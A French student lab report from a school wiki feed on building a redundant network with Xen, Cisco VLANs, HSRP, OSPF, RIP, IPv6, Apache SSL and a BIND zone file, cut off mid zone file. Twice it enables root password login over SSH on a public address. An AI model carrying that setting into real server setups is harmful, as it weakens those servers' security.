		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51987"/>
				<updated>2020-01-02T22:21:04Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration du spanning tree */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 101 ip 10.60.101.3&lt;br /&gt;
   standby 101 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
&lt;br /&gt;
 routerE304(config)#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues une fois que l'interconnexion avec le réseau de l'école est configurée (plus bas).&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
